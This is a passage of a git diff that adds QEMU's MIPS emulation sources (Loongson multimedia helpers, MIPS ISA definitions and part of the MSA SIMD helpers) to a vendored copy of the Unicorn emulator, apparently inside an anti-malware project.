+DEF_HELPER_4(msa_ffint_s_df, void, env, i32, i32, i32) +DEF_HELPER_4(msa_ffint_u_df, void, env, i32, i32, i32) + +DEF_HELPER_5(msa_ld_df, void, env, i32, i32, i32, s32) +DEF_HELPER_5(msa_st_df, void, env, i32, i32, i32, s32) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/lmi_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/lmi_helper.c new file mode 100644 index 0000000..bbfcd59 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/lmi_helper.c @@ -0,0 +1,744 @@ +/* + * Loongson Multimedia Instruction emulation helpers for QEMU. + * + * Copyright (c) 2011 Richard Henderson + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ *
+ * You should have received a copy of the GNU Lesser General Public
+ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
+ */
+
+#include "cpu.h"
+#include "exec/helper-proto.h"
+
+/* If the byte ordering doesn't matter, i.e. all columns are treated
+   identically, then this union can be used directly. If byte ordering
+   does matter, we generally ignore dumping to memory. */
+typedef union {
+    uint8_t ub[8];
+    int8_t sb[8];
+    uint16_t uh[4];
+    int16_t sh[4];
+    uint32_t uw[2];
+    int32_t sw[2];
+    uint64_t d;
+} LMIValue;
+
+/* Some byte ordering issues can be mitigated by XORing in the following. */
+#ifdef HOST_WORDS_BIGENDIAN
+# define BYTE_ORDER_XOR(N) N
+#else
+# define BYTE_ORDER_XOR(N) 0
+#endif
+
+#define SATSB(x) (x < -0x80 ? -0x80 : x > 0x7f ? 0x7f : x)
+#define SATUB(x) (x > 0xff ? 0xff : x)
+
+#define SATSH(x) (x < -0x8000 ? -0x8000 : x > 0x7fff ? 0x7fff : x)
+#define SATUH(x) (x > 0xffff ? 0xffff : x)
+
+#define SATSW(x) \
+    (x < -0x80000000ll ? -0x80000000ll : x > 0x7fffffff ? 0x7fffffff : x)
+#define SATUW(x) (x > 0xffffffffull ? 
0xffffffffull : x) + +uint64_t helper_paddsb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.sb[i] + vt.sb[i]; + vs.sb[i] = SATSB(r); + } + return vs.d; +} + +uint64_t helper_paddusb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.ub[i] + vt.ub[i]; + vs.ub[i] = SATUB(r); + } + return vs.d; +} + +uint64_t helper_paddsh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.sh[i] + vt.sh[i]; + vs.sh[i] = SATSH(r); + } + return vs.d; +} + +uint64_t helper_paddush(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.uh[i] + vt.uh[i]; + vs.uh[i] = SATUH(r); + } + return vs.d; +} + +uint64_t helper_paddb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + vs.ub[i] += vt.ub[i]; + } + return vs.d; +} + +uint64_t helper_paddh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + vs.uh[i] += vt.uh[i]; + } + return vs.d; +} + +uint64_t helper_paddw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; ++i) { + vs.uw[i] += vt.uw[i]; + } + return vs.d; +} + +uint64_t helper_psubsb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.sb[i] - vt.sb[i]; + vs.sb[i] = SATSB(r); + } + return vs.d; +} + +uint64_t helper_psubusb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.ub[i] - vt.ub[i]; + vs.ub[i] = SATUB(r); + } + return vs.d; +} + +uint64_t helper_psubsh(uint64_t fs, uint64_t ft) +{ 
+ LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.sh[i] - vt.sh[i]; + vs.sh[i] = SATSH(r); + } + return vs.d; +} + +uint64_t helper_psubush(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int r = vs.uh[i] - vt.uh[i]; + vs.uh[i] = SATUH(r); + } + return vs.d; +} + +uint64_t helper_psubb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + vs.ub[i] -= vt.ub[i]; + } + return vs.d; +} + +uint64_t helper_psubh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + vs.uh[i] -= vt.uh[i]; + } + return vs.d; +} + +uint64_t helper_psubw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned int i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; ++i) { + vs.uw[i] -= vt.uw[i]; + } + return vs.d; +} + +uint64_t helper_pshufh(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vd, vs; + unsigned i; + + vs.d = fs; + vd.d = 0; + for (i = 0; i < 4; i++, ft >>= 2) { + vd.uh[i ^ host] = vs.uh[(ft & 3) ^ host]; + } + return vd.d; +} + +uint64_t helper_packsswh(uint64_t fs, uint64_t ft) +{ + uint64_t fd = 0; + int64_t tmp; + + tmp = (int32_t)(fs >> 0); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 0; + + tmp = (int32_t)(fs >> 32); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 16; + + tmp = (int32_t)(ft >> 0); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 32; + + tmp = (int32_t)(ft >> 32); + tmp = SATSH(tmp); + fd |= (tmp & 0xffff) << 48; + + return fd; +} + +uint64_t helper_packsshb(uint64_t fs, uint64_t ft) +{ + uint64_t fd = 0; + unsigned int i; + + for (i = 0; i < 4; ++i) { + int16_t tmp = fs >> (i * 16); + tmp = SATSB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8); + } + for (i = 0; i < 4; ++i) { + int16_t tmp = ft >> (i * 16); + tmp = SATSB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i 
* 8 + 32); + } + + return fd; +} + +uint64_t helper_packushb(uint64_t fs, uint64_t ft) +{ + uint64_t fd = 0; + unsigned int i; + + for (i = 0; i < 4; ++i) { + int16_t tmp = fs >> (i * 16); + tmp = SATUB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8); + } + for (i = 0; i < 4; ++i) { + int16_t tmp = ft >> (i * 16); + tmp = SATUB(tmp); + fd |= (uint64_t)(tmp & 0xff) << (i * 8 + 32); + } + + return fd; +} + +uint64_t helper_punpcklwd(uint64_t fs, uint64_t ft) +{ + return (fs & 0xffffffff) | (ft << 32); +} + +uint64_t helper_punpckhwd(uint64_t fs, uint64_t ft) +{ + return (fs >> 32) | (ft & ~0xffffffffull); +} + +uint64_t helper_punpcklhw(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.uh[0 ^ host] = vs.uh[0 ^ host]; + vd.uh[1 ^ host] = vt.uh[0 ^ host]; + vd.uh[2 ^ host] = vs.uh[1 ^ host]; + vd.uh[3 ^ host] = vt.uh[1 ^ host]; + + return vd.d; +} + +uint64_t helper_punpckhhw(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.uh[0 ^ host] = vs.uh[2 ^ host]; + vd.uh[1 ^ host] = vt.uh[2 ^ host]; + vd.uh[2 ^ host] = vs.uh[3 ^ host]; + vd.uh[3 ^ host] = vt.uh[3 ^ host]; + + return vd.d; +} + +uint64_t helper_punpcklbh(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(7); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.ub[0 ^ host] = vs.ub[0 ^ host]; + vd.ub[1 ^ host] = vt.ub[0 ^ host]; + vd.ub[2 ^ host] = vs.ub[1 ^ host]; + vd.ub[3 ^ host] = vt.ub[1 ^ host]; + vd.ub[4 ^ host] = vs.ub[2 ^ host]; + vd.ub[5 ^ host] = vt.ub[2 ^ host]; + vd.ub[6 ^ host] = vs.ub[3 ^ host]; + vd.ub[7 ^ host] = vt.ub[3 ^ host]; + + return vd.d; +} + +uint64_t helper_punpckhbh(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(7); + LMIValue vd, vs, vt; + + vs.d = fs; + vt.d = ft; + vd.ub[0 ^ host] = vs.ub[4 ^ host]; + vd.ub[1 ^ host] = vt.ub[4 ^ host]; + vd.ub[2 ^ host] = vs.ub[5 ^ host]; + vd.ub[3 ^ host] = vt.ub[5 ^ host]; + 
vd.ub[4 ^ host] = vs.ub[6 ^ host];
+    vd.ub[5 ^ host] = vt.ub[6 ^ host];
+    vd.ub[6 ^ host] = vs.ub[7 ^ host];
+    vd.ub[7 ^ host] = vt.ub[7 ^ host];
+
+    return vd.d;
+}
+
+uint64_t helper_pavgh(uint64_t fs, uint64_t ft)
+{
+    LMIValue vs, vt;
+    unsigned i;
+
+    vs.d = fs;
+    vt.d = ft;
+    for (i = 0; i < 4; i++) {
+        vs.uh[i] = (vs.uh[i] + vt.uh[i] + 1) >> 1;
+    }
+    return vs.d;
+}
+
+uint64_t helper_pavgb(uint64_t fs, uint64_t ft)
+{
+    LMIValue vs, vt;
+    unsigned i;
+
+    vs.d = fs;
+    vt.d = ft;
+    for (i = 0; i < 8; i++) {
+        vs.ub[i] = (vs.ub[i] + vt.ub[i] + 1) >> 1;
+    }
+    return vs.d;
+}
+
+uint64_t helper_pmaxsh(uint64_t fs, uint64_t ft)
+{
+    LMIValue vs, vt;
+    unsigned i;
+
+    vs.d = fs;
+    vt.d = ft;
+    for (i = 0; i < 4; i++) {
+        vs.sh[i] = (vs.sh[i] >= vt.sh[i] ? vs.sh[i] : vt.sh[i]);
+    }
+    return vs.d;
+}
+
+uint64_t helper_pminsh(uint64_t fs, uint64_t ft)
+{
+    LMIValue vs, vt;
+    unsigned i;
+
+    vs.d = fs;
+    vt.d = ft;
+    for (i = 0; i < 4; i++) {
+        vs.sh[i] = (vs.sh[i] <= vt.sh[i] ? vs.sh[i] : vt.sh[i]);
+    }
+    return vs.d;
+}
+
+uint64_t helper_pmaxub(uint64_t fs, uint64_t ft)
+{
+    LMIValue vs, vt;
+    unsigned i;
+
+    vs.d = fs;
+    vt.d = ft;
+    for (i = 0; i < 8; i++) {
+        vs.ub[i] = (vs.ub[i] >= vt.ub[i] ? vs.ub[i] : vt.ub[i]);
+    }
+    return vs.d;
+}
+
+uint64_t helper_pminub(uint64_t fs, uint64_t ft)
+{
+    LMIValue vs, vt;
+    unsigned i;
+
+    vs.d = fs;
+    vt.d = ft;
+    for (i = 0; i < 8; i++) {
+        vs.ub[i] = (vs.ub[i] <= vt.ub[i] ?
vs.ub[i] : vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_pcmpeqw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; i++) { + vs.uw[i] = -(vs.uw[i] == vt.uw[i]); + } + return vs.d; +} + +uint64_t helper_pcmpgtw(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 2; i++) { + vs.uw[i] = -(vs.uw[i] > vt.uw[i]); + } + return vs.d; +} + +uint64_t helper_pcmpeqh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.uh[i] = -(vs.uh[i] == vt.uh[i]); + } + return vs.d; +} + +uint64_t helper_pcmpgth(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; i++) { + vs.uh[i] = -(vs.uh[i] > vt.uh[i]); + } + return vs.d; +} + +uint64_t helper_pcmpeqb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; i++) { + vs.ub[i] = -(vs.ub[i] == vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_pcmpgtb(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; i++) { + vs.ub[i] = -(vs.ub[i] > vt.ub[i]); + } + return vs.d; +} + +uint64_t helper_psllw(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 31) { + return 0; + } + vs.d = fs; + for (i = 0; i < 2; ++i) { + vs.uw[i] <<= ft; + } + return vs.d; +} + +uint64_t helper_psrlw(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 31) { + return 0; + } + vs.d = fs; + for (i = 0; i < 2; ++i) { + vs.uw[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_psraw(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 31) { + ft = 31; + } + vs.d = fs; + for (i = 0; i < 2; ++i) { + vs.sw[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_psllh(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + 
ft &= 0x7f; + if (ft > 15) { + return 0; + } + vs.d = fs; + for (i = 0; i < 4; ++i) { + vs.uh[i] <<= ft; + } + return vs.d; +} + +uint64_t helper_psrlh(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 15) { + return 0; + } + vs.d = fs; + for (i = 0; i < 4; ++i) { + vs.uh[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_psrah(uint64_t fs, uint64_t ft) +{ + LMIValue vs; + unsigned i; + + ft &= 0x7f; + if (ft > 15) { + ft = 15; + } + vs.d = fs; + for (i = 0; i < 4; ++i) { + vs.sh[i] >>= ft; + } + return vs.d; +} + +uint64_t helper_pmullh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + vs.sh[i] *= vt.sh[i]; + } + return vs.d; +} + +uint64_t helper_pmulhh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + int32_t r = vs.sh[i] * vt.sh[i]; + vs.sh[i] = r >> 16; + } + return vs.d; +} + +uint64_t helper_pmulhuh(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 4; ++i) { + uint32_t r = vs.uh[i] * vt.uh[i]; + vs.uh[i] = r >> 16; + } + return vs.d; +} + +uint64_t helper_pmaddhw(uint64_t fs, uint64_t ft) +{ + unsigned host = BYTE_ORDER_XOR(3); + LMIValue vs, vt; + uint32_t p0, p1; + + vs.d = fs; + vt.d = ft; + p0 = vs.sh[0 ^ host] * vt.sh[0 ^ host]; + p0 += vs.sh[1 ^ host] * vt.sh[1 ^ host]; + p1 = vs.sh[2 ^ host] * vt.sh[2 ^ host]; + p1 += vs.sh[3 ^ host] * vt.sh[3 ^ host]; + + return ((uint64_t)p1 << 32) | p0; +} + +uint64_t helper_pasubub(uint64_t fs, uint64_t ft) +{ + LMIValue vs, vt; + unsigned i; + + vs.d = fs; + vt.d = ft; + for (i = 0; i < 8; ++i) { + int r = vs.ub[i] - vt.ub[i]; + vs.ub[i] = (r < 0 ? 
-r : r); + } + return vs.d; +} + +uint64_t helper_biadd(uint64_t fs) +{ + unsigned i, fd; + + for (i = fd = 0; i < 8; ++i) { + fd += (fs >> (i * 8)) & 0xff; + } + return fd & 0xffff; +} + +uint64_t helper_pmovmskb(uint64_t fs) +{ + unsigned fd = 0; + + fd |= ((fs >> 7) & 1) << 0; + fd |= ((fs >> 15) & 1) << 1; + fd |= ((fs >> 23) & 1) << 2; + fd |= ((fs >> 31) & 1) << 3; + fd |= ((fs >> 39) & 1) << 4; + fd |= ((fs >> 47) & 1) << 5; + fd |= ((fs >> 55) & 1) << 6; + fd |= ((fs >> 63) & 1) << 7; + + return fd & 0xff; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/mips-defs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/mips-defs.h new file mode 100644 index 0000000..1784227 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/mips-defs.h @@ -0,0 +1,91 @@ +#if !defined (__QEMU_MIPS_DEFS_H__) +#define __QEMU_MIPS_DEFS_H__ + +/* If we want to use host float regs... */ +//#define USE_HOST_FLOAT_REGS + +/* Real pages are variable size... */ +#define TARGET_PAGE_BITS 12 +#define MIPS_TLB_MAX 128 + +#if defined(TARGET_MIPS64) +#define TARGET_LONG_BITS 64 +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 42 +#else +#define TARGET_LONG_BITS 32 +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 +#endif + +/* Masks used to mark instructions to indicate which ISA level they + were introduced in. */ +#define ISA_MIPS1 0x00000001 +#define ISA_MIPS2 0x00000002 +#define ISA_MIPS3 0x00000004 +#define ISA_MIPS4 0x00000008 +#define ISA_MIPS5 0x00000010 +#define ISA_MIPS32 0x00000020 +#define ISA_MIPS32R2 0x00000040 +#define ISA_MIPS64 0x00000080 +#define ISA_MIPS64R2 0x00000100 +#define ISA_MIPS32R3 0x00000200 +#define ISA_MIPS64R3 0x00000400 +#define ISA_MIPS32R5 0x00000800 +#define ISA_MIPS64R5 0x00001000 +#define ISA_MIPS32R6 0x00002000 +#define ISA_MIPS64R6 0x00004000 + +/* MIPS ASEs. 
*/ +#define ASE_MIPS16 0x00010000 +#define ASE_MIPS3D 0x00020000 +#define ASE_MDMX 0x00040000 +#define ASE_DSP 0x00080000 +#define ASE_DSPR2 0x00100000 +#define ASE_MT 0x00200000 +#define ASE_SMARTMIPS 0x00400000 +#define ASE_MICROMIPS 0x00800000 +#define ASE_MSA 0x01000000 + +/* Chip specific instructions. */ +#define INSN_LOONGSON2E 0x20000000 +#define INSN_LOONGSON2F 0x40000000 +#define INSN_VR54XX 0x80000000 + +/* MIPS CPU defines. */ +#define CPU_MIPS1 (ISA_MIPS1) +#define CPU_MIPS2 (CPU_MIPS1 | ISA_MIPS2) +#define CPU_MIPS3 (CPU_MIPS2 | ISA_MIPS3) +#define CPU_MIPS4 (CPU_MIPS3 | ISA_MIPS4) +#define CPU_VR54XX (CPU_MIPS4 | INSN_VR54XX) +#define CPU_LOONGSON2E (CPU_MIPS3 | INSN_LOONGSON2E) +#define CPU_LOONGSON2F (CPU_MIPS3 | INSN_LOONGSON2F) + +#define CPU_MIPS5 (CPU_MIPS4 | ISA_MIPS5) + +/* MIPS Technologies "Release 1" */ +#define CPU_MIPS32 (CPU_MIPS2 | ISA_MIPS32) +#define CPU_MIPS64 (CPU_MIPS5 | CPU_MIPS32 | ISA_MIPS64) + +/* MIPS Technologies "Release 2" */ +#define CPU_MIPS32R2 (CPU_MIPS32 | ISA_MIPS32R2) +#define CPU_MIPS64R2 (CPU_MIPS64 | CPU_MIPS32R2 | ISA_MIPS64R2) + +/* MIPS Technologies "Release 3" */ +#define CPU_MIPS32R3 (CPU_MIPS32R2 | ISA_MIPS32R3) +#define CPU_MIPS64R3 (CPU_MIPS64R2 | CPU_MIPS32R3 | ISA_MIPS64R3) + +/* MIPS Technologies "Release 5" */ +#define CPU_MIPS32R5 (CPU_MIPS32R3 | ISA_MIPS32R5) +#define CPU_MIPS64R5 (CPU_MIPS64R3 | CPU_MIPS32R5 | ISA_MIPS64R5) + +/* MIPS Technologies "Release 6" */ +#define CPU_MIPS32R6 (CPU_MIPS32R5 | ISA_MIPS32R6) +#define CPU_MIPS64R6 (CPU_MIPS64R5 | CPU_MIPS32R6 | ISA_MIPS64R6) + +/* Strictly follow the architecture standard: + - Disallow "special" instruction handling for PMON/SPIM. + Note that we still maintain Count/Compare to match the host clock. 
*/ +//#define MIPS_STRICT_STANDARD 1 + +#endif /* !defined (__QEMU_MIPS_DEFS_H__) */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/msa_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/msa_helper.c new file mode 100644 index 0000000..dccadc4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/msa_helper.c @@ -0,0 +1,3436 @@ +/* + * MIPS SIMD Architecture Module Instruction emulation helpers for QEMU. + * + * Copyright (c) 2014 Imagination Technologies + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#include "cpu.h" +#include "exec/helper-proto.h" + +/* Data format min and max values */ +#define DF_BITS(df) ((uint64_t)1 << ((df) + 3)) + +#define DF_MAX_INT(df) (int64_t)((1LL << (DF_BITS(df) - 1)) - 1) +#define M_MAX_INT(m) (int64_t)((1LL << ((m) - 1)) - 1) + +#define DF_MIN_INT(df) (int64_t)(-(1LL << (DF_BITS(df) - 1))) +#define M_MIN_INT(m) (int64_t)(-(1LL << ((m) - 1))) + +#define DF_MAX_UINT(df) (uint64_t)((0-1ULL) >> (64 - DF_BITS(df))) +#define M_MAX_UINT(m) (uint64_t)((0-1ULL) >> (64 - (m))) + +#define UNSIGNED(x, df) ((x) & DF_MAX_UINT(df)) +#define SIGNED(x, df) \ + ((((int64_t)x) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df))) + +/* Element-by-element access macros */ +#define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) + +static inline void msa_move_v(wr_t *pwd, wr_t *pws) +{ + uint32_t i; + + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { + pwd->d[i] = pws->d[i]; + } +} + +#define MSA_FN_IMM8(FUNC, DEST, OPERATION) \ +void helper_msa_ ## FUNC(CPUMIPSState *env, uint32_t wd, uint32_t ws, \ + uint32_t i8) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + uint32_t i; \ + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { \ + DEST = OPERATION; \ + } \ +} + +MSA_FN_IMM8(andi_b, pwd->b[i], pws->b[i] & i8) +MSA_FN_IMM8(ori_b, pwd->b[i], pws->b[i] | i8) +MSA_FN_IMM8(nori_b, pwd->b[i], ~(pws->b[i] | i8)) +MSA_FN_IMM8(xori_b, pwd->b[i], pws->b[i] ^ i8) + +#define BIT_MOVE_IF_NOT_ZERO(dest, arg1, arg2, df) \ + UNSIGNED(((dest & (~arg2)) | (arg1 & arg2)), df) +MSA_FN_IMM8(bmnzi_b, pwd->b[i], + BIT_MOVE_IF_NOT_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) + +#define BIT_MOVE_IF_ZERO(dest, arg1, arg2, df) \ + UNSIGNED((dest & arg2) | (arg1 & (~arg2)), df) +MSA_FN_IMM8(bmzi_b, pwd->b[i], + BIT_MOVE_IF_ZERO(pwd->b[i], pws->b[i], i8, DF_BYTE)) + +#define BIT_SELECT(dest, arg1, arg2, df) \ + UNSIGNED((arg1 & (~dest)) | (arg2 & dest), df) +MSA_FN_IMM8(bseli_b, pwd->b[i], + BIT_SELECT(pwd->b[i], pws->b[i], i8, DF_BYTE)) + 
+#undef MSA_FN_IMM8 + +#define SHF_POS(i, imm) (((i) & 0xfc) + (((imm) >> (2 * ((i) & 0x03))) & 0x03)) + +void helper_msa_shf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, + uint32_t ws, uint32_t imm) +{ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); + wr_t *pws = &(env->active_fpu.fpr[ws].wr); + wr_t wx, *pwx = &wx; + uint32_t i; + + switch (df) { + case DF_BYTE: + for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { + pwx->b[i] = pws->b[SHF_POS(i, imm)]; + } + break; + case DF_HALF: + for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { + pwx->h[i] = pws->h[SHF_POS(i, imm)]; + } + break; + case DF_WORD: + for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { + pwx->w[i] = pws->w[SHF_POS(i, imm)]; + } + break; + default: + assert(0); + } + msa_move_v(pwd, pwx); +} + +#define MSA_FN_VECTOR(FUNC, DEST, OPERATION) \ +void helper_msa_ ## FUNC(CPUMIPSState *env, uint32_t wd, uint32_t ws, \ + uint32_t wt) \ +{ \ + wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ + wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ + wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ + uint32_t i; \ + for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { \ + DEST = OPERATION; \ + } \ +} + +MSA_FN_VECTOR(and_v, pwd->d[i], pws->d[i] & pwt->d[i]) +MSA_FN_VECTOR(or_v, pwd->d[i], pws->d[i] | pwt->d[i]) +MSA_FN_VECTOR(nor_v, pwd->d[i], ~(pws->d[i] | pwt->d[i])) +MSA_FN_VECTOR(xor_v, pwd->d[i], pws->d[i] ^ pwt->d[i]) +MSA_FN_VECTOR(bmnz_v, pwd->d[i], + BIT_MOVE_IF_NOT_ZERO(pwd->d[i], pws->d[i], pwt->d[i], DF_DOUBLE)) +MSA_FN_VECTOR(bmz_v, pwd->d[i], + BIT_MOVE_IF_ZERO(pwd->d[i], pws->d[i], pwt->d[i], DF_DOUBLE)) +MSA_FN_VECTOR(bsel_v, pwd->d[i], + BIT_SELECT(pwd->d[i], pws->d[i], pwt->d[i], DF_DOUBLE)) +#undef BIT_MOVE_IF_NOT_ZERO +#undef BIT_MOVE_IF_ZERO +#undef BIT_SELECT +#undef MSA_FN_VECTOR + +static inline int64_t msa_addv_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 + arg2; +} + +static inline int64_t msa_subv_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 - arg2; +} + +static inline int64_t 
msa_ceq_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 == arg2 ? -1 : 0; +} + +static inline int64_t msa_cle_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 <= arg2 ? -1 : 0; +} + +static inline int64_t msa_cle_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 <= u_arg2 ? -1 : 0; +} + +static inline int64_t msa_clt_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 < arg2 ? -1 : 0; +} + +static inline int64_t msa_clt_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 < u_arg2 ? -1 : 0; +} + +static inline int64_t msa_max_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 > arg2 ? arg1 : arg2; +} + +static inline int64_t msa_max_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 > u_arg2 ? arg1 : arg2; +} + +static inline int64_t msa_min_s_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + return arg1 < arg2 ? arg1 : arg2; +} + +static inline int64_t msa_min_u_df(uint32_t df, int64_t arg1, int64_t arg2) +{ + uint64_t u_arg1 = UNSIGNED(arg1, df); + uint64_t u_arg2 = UNSIGNED(arg2, df); + return u_arg1 < u_arg2 ? 
